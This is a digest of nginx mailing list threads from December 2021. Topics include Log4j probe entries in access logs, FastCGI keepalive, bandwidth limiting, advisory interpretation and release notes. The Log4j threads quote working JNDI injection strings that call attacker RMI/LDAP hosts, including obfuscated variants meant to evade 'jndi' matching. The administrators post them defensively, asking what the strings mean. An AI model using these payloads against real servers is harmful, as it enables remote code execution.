<20211219200208.691f776b.lists@lazygranch.com> Message-ID: <20211220110825.2175a142.lists@lazygranch.com> On Mon, 20 Dec 2021 17:49:48 +0000 Jay Caines-Gooby wrote: > The request is for your index page "GET / HTTP/1.1"; that's why your > server responded with 200 OK. The special characters are in the > referer and user-agent fields, as a log4j system would also try to > interpolate these, and thus be vulnerable to the exploit. > > On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com > wrote: > > > I don't have any service using java so I don't believe I am subject > > to this exploit. Howerver I am confused why a returned a 200 for > > this request. The special characters in the URL are confusing. > > > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / > > HTTP/1.1" 706 > > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" > > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" > > > > log_format main '$status $remote_addr - $remote_user > > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > > '"$http_user_agent" "$http_x_forwarded_for"'; > > > > That is my log format from the nginx.conf. > > > > I now have a map to catch "jndi" in both url and agent. So far so > > good not that it matters much. I just like to gather IP addresses > > from hackers and block their host if it lacks eyeballs, > > _______________________________________________ Thanks for both replies. Note the hackers have done a work around to get past my simple "map" detection. Matching jndi is not sufficient. Examples: 103.107.245.1 - - [20/Dec/2021:14:38:15 +0000] "GET / HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary }" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-" 103.107.245.1 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A 1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389 /Binary}" "-" I can't really tell if this Indonesian IP address is an ISP or not so I guess I will let them slide from the firewall. The other IP is for Digital Ocean. I have some droplets there and yeah there are bad actors on the service. Kind of sad I have to block the vendor I use but probably AWS, Linode, etc is just as bad. For the price of the service you simply can't police it at scale. Probably another stupid question but what is up with this ${ stuff? I need some terminology to google and read up on this. From mdounin at mdounin.ru Mon Dec 20 19:35:36 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Dec 2021 22:35:36 +0300 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Message-ID: Hello! On Mon, Dec 20, 2021 at 04:00:59PM +0000, Nicolas Franck wrote: > Interesting! > > I looks like there is nothing that managing the incoming connections > for the fcgi workers. Every fcgi worker needs to do this on its own, right? > So if there are more clients (i.e. nginx workers) than fcgi workers, > then it becomes unresponsive after a few requests, because all > the fcgi workers are holding on to a connection to an nginx worker, > and there seems to be no queue handling this. > > Is this correct? Just guessing here More or less. The FastCGI code in your example implies very simple connection management, based on the process-per-connection model. As long as all FastCGI processes are busy, all additional connections will be queued in the listen queue of FastCGI listening socket (till a connection is closed). Certainly that's not the only model possible with FastCGI, but the easiest to use. The process-per-connection model doesn't combine well with keepalive connections, since each keepalive connection occupies the whole process. And you have to create enough processes to handle all keepalive connections you want to be able to keep alive. In case of nginx as a client, this means at least ( * ) processes. Alternatively, you can avoid using keepalive connections. These are not really needed for local upstream servers, since connection establishment costs are usually negligible compared to the total request processing costs. And this is what nginx does by default. -- Maxim Dounin http://mdounin.ru/ From Nicolas.Franck at UGent.be Mon Dec 20 20:53:48 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Mon, 20 Dec 2021 20:53:48 +0000 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Message-ID: <27987D2A-4C8F-4D5A-9BDA-0F1110D968B1@ugent.be> I kind of agree: keepalive connections are not strictly necessary in this scenario. But there is a reason why I started looking into this: I started noticing a lot of closed tcp connections with status TIME_WAIT. That happens when you close the connection on your end, and the os keeps these around for a few seconds, to make sure that the other end of the connection got the tcp "FIN". During that time the client port for that connection cannot be used: $ netstat -an | grep :5000 (if the fcgi app is listening on port 5000) If you receive a lot of requests after each other, and the number grows larger than the os can free the TIME_WAIT connections, then you'll run out of client ports, and see seemingly unrelated errors like "dns lookup failure". This even happens when the response of the upstream server is fast, as it takes a "lot" of time before the TIME_WAIT connections are freed. Reuse of tcp connections is one way to tackle this problem. Playing around with sysctl is another: $ sysctl -w net.ipv4.tcp_tw_recycle=1 But I am not well versed in this, and I do not know a lot about the possible side effects. cf. https://web3us.com/drupal6/how-guides/what-timewait-state cf. https://onlinehelp.opswat.com/centralmgmt/What_you_need_to_do_if_you_see_too_many_TIME_WAIT_sockets.html On 20 Dec 2021, at 20:35, Maxim Dounin > wrote: Hello! On Mon, Dec 20, 2021 at 04:00:59PM +0000, Nicolas Franck wrote: Interesting! I looks like there is nothing that managing the incoming connections for the fcgi workers. Every fcgi worker needs to do this on its own, right? So if there are more clients (i.e. nginx workers) than fcgi workers, then it becomes unresponsive after a few requests, because all the fcgi workers are holding on to a connection to an nginx worker, and there seems to be no queue handling this. Is this correct? Just guessing here More or less. The FastCGI code in your example implies very simple connection management, based on the process-per-connection model. As long as all FastCGI processes are busy, all additional connections will be queued in the listen queue of FastCGI listening socket (till a connection is closed). Certainly that's not the only model possible with FastCGI, but the easiest to use. The process-per-connection model doesn't combine well with keepalive connections, since each keepalive connection occupies the whole process. And you have to create enough processes to handle all keepalive connections you want to be able to keep alive. In case of nginx as a client, this means at least ( * ) processes. Alternatively, you can avoid using keepalive connections. These are not really needed for local upstream servers, since connection establishment costs are usually negligible compared to the total request processing costs. And this is what nginx does by default. -- Maxim Dounin https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmdounin.ru%2F&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cb8a3cee984e84e47f86408d9c3efed9f%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756257522060451%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=%2FSv4njqodduc7rpTd5m0FXnO1DBmQooZmFXABzKbC2A%3D&reserved=0 _______________________________________________ nginx mailing list nginx at nginx.org https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cb8a3cee984e84e47f86408d9c3efed9f%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756257522060451%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=3gI9%2F8oxIPl65YD1pbdE5zT%2FsUM7JQUW5qLkQpSCAGU%3D&reserved=0 -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Dec 22 23:47:44 2021 From: francis at daoine.org (Francis Daly) Date: Wed, 22 Dec 2021 23:47:44 +0000 Subject: bandwidth limit for specific server In-Reply-To: References: Message-ID: <20211222234744.GC12557@daoine.org> On Sat, Dec 18, 2021 at 01:37:11PM +0800, huiming wrote: Hi there, > Is it possible to limit total bandwidth for server? Using only stock nginx, I believe the answer is "yes, but not in a way that you would want; so effectively no". You can limit the number of concurrent (active) connections; you can limit the rate of requests that nginx will process; and you can limit the response bandwidth for each request. By combining those, you can put an upper limit on the response bandwidth; but I suspect that it is unlikely to be useful for you. You might be happier looking for a third-party module that does some form of internal bandwidth limiting; or use something outside of nginx to limit the bandwidth. The latter would probably be simpler if your chosen server_name was the only one this nginx handled; or if the IP address were dedicated to this server_name -- in those cases, the external thing would not need to know much (or anything?) about what nginx is doing; it could just handle "traffic from this process group", or "traffic from this IP address". > server { > listen 443 ssl; > server_name x.x.x.x.x; > > > is it possible to limit total bandwidth for this server to for example 5M ? not to limit TCP connection bandwidth. need total bandwidth. It is using the TCP connection bandwidth limit; but if you were to "limit_rate" to 1m and "limit_req" to 5 r/s, then you would not use more than 5M (bps) -- but you would probably normally end up using less than that; because individual requests would not use 5, while multiple requests would probably lead to lots of small failure responses. Good luck with it, f -- Francis Daly francis at daoine.org From 877509395 at qq.com Thu Dec 23 01:53:26 2021 From: 877509395 at qq.com (=?gb18030?B?aHVpbWluZw==?=) Date: Thu, 23 Dec 2021 09:53:26 +0800 Subject: bandwidth limit for specific server In-Reply-To: <20211222234744.GC12557@daoine.org> References: <20211222234744.GC12557@daoine.org> Message-ID: Francis Daly?       extremely appreciative of your feedback.      Any suggestion for third-party module that does some form of internal bandwidth limiting?  thanks huiming ------------------ Original ------------------ From: "nginx" From francis at daoine.org Fri Dec 24 13:23:31 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 24 Dec 2021 13:23:31 +0000 Subject: bandwidth limit for specific server In-Reply-To: References: <20211222234744.GC12557@daoine.org> Message-ID: <20211224132331.GE12557@daoine.org> On Thu, Dec 23, 2021 at 09:53:26AM +0800, huiming wrote: Hi there, > Any suggestion for third-party module that does some form of internal bandwidth limiting? Noting that I imagine that if this facility were straightforward to implement efficiently and reliably in a future-proof fashion, it would already be included in a stock nginx module; I can see that a web search for some likely-looking terms points at https://github.com/vozlt/nginx-module-vts as maybe being interesting. (But I'm not sure if that limits the total transfer, or the transfer rate. You'll want to test if it does the thing that you want, and if the limitations are acceptable to you.) Good luck with it, f -- Francis Daly francis at daoine.org From Nicolas.Franck at UGent.be Fri Dec 24 14:26:26 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Fri, 24 Dec 2021 14:26:26 +0000 Subject: bandwidth limit for specific server In-Reply-To: <20211224132331.GE12557@daoine.org> References: <20211222234744.GC12557@daoine.org> <20211224132331.GE12557@daoine.org> Message-ID: <52816AFA-51B4-4042-A0BA-BDE5E2AD4B42@ugent.be> Something to take into account: if you limit the bandwidth, a nginx worker will have to spend more time for that request, time he cannot spend on other, possibly more meaningful requests. > On 24 Dec 2021, at 14:23, Francis Daly wrote: > > On Thu, Dec 23, 2021 at 09:53:26AM +0800, huiming wrote: > > Hi there, > >> Any suggestion for third-party module that does some form of internal bandwidth limiting? > > Noting that I imagine that if this facility were straightforward > to implement efficiently and reliably in a future-proof fashion, > it would already be included in a stock nginx module; I can > see that a web search for some likely-looking terms points at > https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fvozlt%2Fnginx-module-vts&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cf8ccb3df1ea8452a46bf08d9c6e0a02d%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637759490768086551%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=S61bxGKoqFHttBvuP3nl5YAaGBJkJyVMmvBr96R699I%3D&reserved=0 as maybe being interesting. > > (But I'm not sure if that limits the total transfer, or the transfer > rate. You'll want to test if it does the thing that you want, and if > the limitations are acceptable to you.) > > Good luck with it, > > f > -- > Francis Daly francis at daoine.org > _______________________________________________ > nginx mailing list > nginx at nginx.org > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cf8ccb3df1ea8452a46bf08d9c6e0a02d%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637759490768086551%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=VTsIXXzZRvtaPGQ%2Fp42Dv8DCM%2FBB8dABBBPcbpx03VI%3D&reserved=0 From paul at stormy.ca Fri Dec 24 16:42:41 2021 From: paul at stormy.ca (Paul) Date: Fri, 24 Dec 2021 11:42:41 -0500 Subject: bandwidth limit for specific server In-Reply-To: References: <20211222234744.GC12557@daoine.org> Message-ID: On 2021-12-22 8:53 p.m., huiming wrote: > Francis Daly? > > ?extremely appreciative of your feedback. > > ? ? ?Any suggestion for third-party module that does some form of > internal bandwidth limiting? Disclaimer: this is not a specific nginx reply. And it's not third-party. You can profile all uses of bandwidth within a linux environment using tc (please see ) Season's greetings to all on list, Paul --- Tired old sys-admin. > > thanks > huiming > > > ------------------?Original?------------------ > *From:* "nginx" ; > *Date:*?Thu, Dec 23, 2021 07:47 AM > *To:*?"nginx"; > *Subject:*?Re: bandwidth limit for specific server > > On Sat, Dec 18, 2021 at 01:37:11PM +0800, huiming wrote: > > Hi there, > > >?? Is it possible to limit total bandwidth for server? > > Using only stock nginx, I believe the answer is "yes, but not in a way > that you would want; so effectively no". > > You can limit the number of concurrent (active) connections; you can > limit the rate of requests that nginx will process; and you can limit > the response bandwidth for each request. > > By combining those, you can put an upper limit on the response bandwidth; > but I suspect that it is unlikely to be useful for you. > > > > You might be happier looking for a third-party module that does some > form of internal bandwidth limiting; or use something outside of nginx > to limit the bandwidth. > > The latter would probably be simpler if your chosen server_name was > the only one this nginx handled; or if the IP address were dedicated to > this server_name -- in those cases, the external thing would not need to > know much (or anything?) about what nginx is doing; it could just handle > "traffic from this process group", or "traffic from this IP address". > > >?? server { > >???? listen?? 443 ssl; > >???? server_name x.x.x.x.x; > > > > > >???? is it possible to limit total bandwidth for this server to for > example 5M ? not to limit TCP connection bandwidth. need total bandwidth. > > It is using the TCP connection bandwidth limit; but if you were to > "limit_rate" to 1m and "limit_req" to 5 r/s, then you would not use > more than 5M (bps) -- but you would probably normally end up using less > than that; because individual requests would not use 5, while multiple > requests would probably lead to lots of small failure responses. > > Good luck with it, > > f > -- > Francis Daly??????? francis at daoine.org > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > \\\||// (@ @) ooO_(_)_Ooo__________________________________ |______|_____|_____|_____|_____|_____|_____|_____| |___|____|_____|_____|_____|_____|_____|_____|____| |_____|_____| mailto:paul at stormy.ca _|____|____| From nginx-forum at forum.nginx.org Sat Dec 25 15:14:32 2021 From: nginx-forum at forum.nginx.org (rjvbzeoibvpzie) Date: Sat, 25 Dec 2021 10:14:32 -0500 Subject: Alert: ignore long locked inactive cache entry In-Reply-To: References: Message-ID: <3c00b8441d6495fed6aa6d7eefa99e82.NginxMailingListEnglish@forum.nginx.org> # cat /var/log/nginx/error.log 2021/12/25 03:27:20 [alert] 3509876#3509876: ignore long locked inactive cache entry 896ea4afe7d75fae51aada8fb6643347, count:1 2021/12/25 07:57:02 [alert] 3509876#3509876: ignore long locked inactive cache entry c4008f632b145d701271b37180818fb8, count:2 2021/12/25 11:14:15 [alert] 3509876#3509876: ignore long locked inactive cache entry c5e2871d4c2314567a1960f9ad10d073, count:3 2021/12/25 12:55:22 [alert] 3509876#3509876: ignore long locked inactive cache entry f0996097b19a16ba901048bd02f27392, count:12 2021/12/25 13:35:55 [alert] 3509876#3509876: ignore long locked inactive cache entry ac59cdf58270b936105d0588eb036a04, count:12 2021/12/25 13:43:53 [alert] 3509876#3509876: ignore long locked inactive cache entry 06a24ed9b7cace543d7189bc19e27f93, count:1 # nginx -V nginx version: nginx/1.21.4 built with OpenSSL 1.1.1f 31 Mar 2020 TLS SNI support enabled configure arguments: --with-cc-opt='-g -O2 -fdebug-prefix-map=/build/nginx-9JOsze/nginx-1.21.4=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC -Wdate-time -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -Wl,-z,relro -Wl,-z,now -fPIC' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-compat --with-debug --with-pcre-jit --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module Posted at Nginx Forum: https://forum.nginx.org/read.php?2,291199,293142#msg-293142 From hritikxx8 at gmail.com Tue Dec 28 08:44:07 2021 From: hritikxx8 at gmail.com (Hritik Vijay) Date: Tue, 28 Dec 2021 14:14:07 +0530 Subject: Nginx advisories with not vulnerable versions inside the vulnerable range Message-ID: Hello I'm trying to parse the advisories page present at https://nginx.org/en/security_advisories.html. So far, I've understood the even-odd minor versioning scheme for branches (thanks to Maxim at https://marc.info/?l=nginx&m=163174223924231&w=2). There still exists some advisories that are hard to understand. For example: Excessive CPU usage in HTTP/2 with small window updates Severity: medium Advisory CVE-2019-9511 Not vulnerable: 1.17.3+, 1.16.1+ Vulnerable: 1.9.5-1.17.2 Here, the vulnerable versions are through 1.9.5 to 1.17.2, even though the versions 1.16.1+ are marked not vulnerable. Looking at the odd numbers in the vulnerable range, I could infer that perhaps the vulnerability spanned through the mainline branch only. Even then it raises some questions. Following are some interpretations and the problems with them: Interpretation: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch. Problem: 1.16.1+ is marked as not vulnerable so the vulnerability must have been fixed in the 1.16 stable branch as well. Interpretation: Only mainline versions between 1.9.5-1.17.2 are vulnerable (as the upper and lower bounds have odd minor) Problem: This implies the stable versions 1.10.1+, 1.12.1+ ... 1.16.1+ are not vulnerable, this is less likely as these ranges did not make it into the not vulnerable range. Interpretation: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch, except the ones mentioned in the not vulnerable range Problem: If the not vulnerable range is to be interpreted as an "exception" to the vulnerable range then there's no point in mentioning 1.17.3+ as it already lies outside the vulnerable range. The last interpretation sounds most reasonable to me with the following changes: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch. It was fixed in the only provided mainline branch that is 1.17.3+, although some fixes were provided to the stable branches as well (here only one stable branch, that is 1.16.1+). This will require a hard requirement for the following: Not Vulnerable: One mainline version with plus sign, One or many stable branch version with plus sign Vulnerable: A range independent of branching scheme (mainline and stable) Although, this sounds right and suits for most of the advisories present on the page, it doesn't handle: Buffer underflow vulnerability Severity: major VU#180065 CVE-2009-2629 Not vulnerable: 0.8.15+, 0.7.62+, 0.6.39+, 0.5.38+ Vulnerable: 0.1.0-0.8.14 As there are more than one mainline branch - 0.7.62+ and 0.5.38+ - in the "Not Vulnerable" range, where there should only be one. Once a vulnerability is fixed in a lower mainline version (0.5.38) it must have been fixed in later mainline and stable versions, which doesn't seem to be the case here (as 0.7.62+ and 0.6.39+ are mentioned explicitly). Is there any other interpretation that I'm missing that is more suitable here ? Also, are there any plans to document the same ? From mdounin at mdounin.ru Tue Dec 28 14:27:41 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 28 Dec 2021 17:27:41 +0300 Subject: Nginx advisories with not vulnerable versions inside the vulnerable range In-Reply-To: References: Message-ID: Hello! On Tue, Dec 28, 2021 at 02:14:07PM +0530, Hritik Vijay wrote: > I'm trying to parse the advisories page present at > https://nginx.org/en/security_advisories.html. So far, I've understood > the even-odd minor versioning scheme for branches (thanks to Maxim at https://marc.info/?l=nginx&m=163174223924231&w=2). > There still exists some advisories that are hard to understand. > For example: > Excessive CPU usage in HTTP/2 with small window updates > Severity: medium > Advisory > CVE-2019-9511 > Not vulnerable: 1.17.3+, 1.16.1+ > Vulnerable: 1.9.5-1.17.2 > > Here, the vulnerable versions are through 1.9.5 to 1.17.2, even though > the versions 1.16.1+ are marked not vulnerable. > Looking at the odd numbers in the vulnerable range, I could infer that > perhaps the vulnerability spanned through the mainline branch only. Even > then it raises some questions. Following are some interpretations and > the problems with them: [...] > Interpretation: > All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the > branch, except the ones mentioned in the not vulnerable range > Problem: > If the not vulnerable range is to be interpreted as an "exception" > to the vulnerable range then there's no point in mentioning 1.17.3+ > as it already lies outside the vulnerable range. That's the correct interpretation. While explicitly mentioning 1.17.3+ as not vulnerable is not strictly needed, it is just duplicate information to simplify reading. > The last interpretation sounds most reasonable to me with the following > changes: > All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the > branch. It was fixed in the only provided mainline branch that is > 1.17.3+, although some fixes were provided to the stable branches as > well (here only one stable branch, that is 1.16.1+). > > This will require a hard requirement for the following: > Not Vulnerable: > One mainline version with plus sign, > One or many stable branch version with plus sign > Vulnerable: > A range independent of branching scheme (mainline and stable) > > Although, this sounds right and suits for most of the advisories present > on the page, it doesn't handle: > Buffer underflow vulnerability > Severity: major > VU#180065 CVE-2009-2629 > Not vulnerable: 0.8.15+, 0.7.62+, 0.6.39+, 0.5.38+ > Vulnerable: 0.1.0-0.8.14 > > As there are more than one mainline branch - 0.7.62+ and 0.5.38+ - in > the "Not Vulnerable" range, where there should only be one. Once a > vulnerability is fixed in a lower mainline version (0.5.38) it must have > been fixed in later mainline and stable versions, which doesn't seem to > be the case here (as 0.7.62+ and 0.6.39+ are mentioned explicitly). Your interpretation of "mainline" and "stable" is incorrect here. The odd/even numbering scheme is in use only starting with nginx 1.0.x. In previous versions, a branch was simply declared stable at some point. For example, 0.5.x branch was mainline (current) till 0.5.25, and then 0.6.0 version was released, and 0.5.x branch was declared stable[1]. Similarly, 0.6.x branch was mainline till 0.6.31, and was declared stable after 0.7.0 release. For additional details about all existing branches check the download page (http://nginx.org/en/download.html) and relevant CHANGES and CHANGES-X.Y files. Note that it is generally trivial to find out if a version is vulnerable or not from the information about a vulnerability, without any knowledge about nginx branches. That is: - Check if the version is in "Vulnerable" range. If it's not, the version is not vulnerable. - If it is, check if the branch is explicitly listed in the "Not vulnerable". If it's not, the version is vulnerable. If it is, check the minor number: if it's greater or equal to the version listed as not vulnerable, the version is not vulnerable, else the version is vulnerable. Hope this helps. [1] http://mailman.nginx.org/pipermail/nginx/2007-June/001080.html -- Maxim Dounin http://mdounin.ru/ From mdounin at mdounin.ru Tue Dec 28 15:41:50 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 28 Dec 2021 18:41:50 +0300 Subject: nginx-1.21.5 Message-ID: Changes with nginx 1.21.5 28 Dec 2021 *) Change: now nginx is built with the PCRE2 library by default. *) Change: now nginx always uses sendfile(SF_NODISKIO) on FreeBSD. *) Feature: support for sendfile(SF_NOCACHE) on FreeBSD. *) Feature: the $ssl_curve variable. *) Bugfix: connections might hang when using HTTP/2 without SSL with the "sendfile" and "aio" directives. -- Maxim Dounin http://nginx.org/ From xeioex at nginx.com Tue Dec 28 16:07:12 2021 From: xeioex at nginx.com (Dmitry Volyntsev) Date: Tue, 28 Dec 2021 19:07:12 +0300 Subject: njs-0.7.1 Message-ID: Hello, I'm glad to announce a new release of NGINX JavaScript module (njs). This release focuses on stabilization of recently released features including async/await and HTTPS support in ngx.fetch(). The "js_include" directive deprecated since 0.4.0 was removed. Also a series of user invisible refactoring was committed. The most prominent one is PCRE2 support. PCRE2 is the default RegExp engine now. Learn more about njs: - Overview and introduction: https://nginx.org/en/docs/njs/ - NGINX JavaScript in Your Web Server Configuration: https://youtu.be/Jc_L6UffFOs - Extending NGINX with Custom Code: https://youtu.be/0CVhq4AUU7M - Using node modules with njs: https://nginx.org/en/docs/njs/node_modules.html - Writing njs code using TypeScript definition files: https://nginx.org/en/docs/njs/typescript.html We are hiring: If you are a C programmer, passionate about Open Source and you love what we do, consider the following career opportunity: https://ffive.wd5.myworkdayjobs.com/NGINX/job/Ireland-Homebase/Software-Engineer-III---NGNIX-NJS_RP1022237 Feel free to try it and give us feedback on: - Github: https://github.com/nginx/njs/issues - Mailing list: https://mailman.nginx.org/mailman/listinfo/nginx-devel Changes with njs 0.7.1 28 Dec 2021 nginx modules: *) Change: the "js_include" directive deprecated since 0.4.0 was removed. *) Change: PCRE/PCRE2-specific code was moved to the modules. This ensures that njs uses the same RegExp library as nginx. Core: *) Feature: extended "fs" module. Added stat(), fstat() and friends. *) Change: default RegExp engine for CLI is switched to PCRE2. *) Bugfix: fixed decodeURI() and decodeURIComponent() with invalid byte strings. The bug was introduced in 0.4.3. *) Bugfix: fixed heap-use-after-free in await frame. The bug was introduced in 0.7.0. *) Bugfix: fixed WebCrypto sign() and verify() methods with OpenSSL 3.0. *) Bugfix: fixed exception throwing when RegExp match fails. The bug was introduced in 0.1.15. *) Bugfix: fixed catching of exception thrown in try block of async function. The bug was introduced in 0.7.0. *) Bugfix: fixed execution of async function in synchronous context. The bug was introduced in 0.7.0. *) Bugfix: fixed function redeclaration in CLI when interactive mode is on. The bug was introduced in 0.6.2. *) Bugfix: fixed typeof operator with DataView object. *) Bugfix: eliminated information leak in Buffer.from(). From mauro.tridici at cmcc.it Wed Dec 29 14:55:35 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 15:55:35 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning Message-ID: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Dear Users, I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? You can see below the mail notification I received: Attack Notification. 2021 Dec 28 20:45:59 Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." Src IP: 166.137.252.110 Portion of the log(s): 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a } HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" Thank you in advance, Mauro -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at lazygranch.com Wed Dec 29 17:03:21 2021 From: lists at lazygranch.com (lists) Date: Wed, 29 Dec 2021 09:03:21 -0800 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: That IP space is certified shady. I detect the occasional hack from them. See? https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ and https://wirelessdataspco.org/faq.php These wireless companies will do anything for money including leasing their IP space.? I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them.? I will leave it up to the gurus to parse the log.?? ? Original Message ? From: mauro.tridici at cmcc.it Sent: December 29, 2021 6:55 AM To: nginx at nginx.org Reply-to: nginx at nginx.org Subject: Help request about Log4j attack attempts and NGINX logs meaning Dear Users, I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? You can see below the mail notification I received: Attack Notification. 2021 Dec 28 20:45:59 Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." Src IP: 166.137.252.110 Portion of the log(s): 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" Thank you in advance, Mauro? From mauro.tridici at cmcc.it Wed Dec 29 17:17:14 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 18:17:14 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: Message-ID: Thank you very much for your reply. I really appreciated it. I?ll wait for the final gurus feedback too. Mauro > On 29 Dec 2021, at 18:03, lists wrote: > > That IP space is certified shady. I detect the occasional hack from them. See > > https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ > > and > > https://wirelessdataspco.org/faq.php > > These wireless companies will do anything for money including leasing their IP space. > > I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. > > I will leave it up to the gurus to parse the log. > > > > > > > Original Message > > > From: 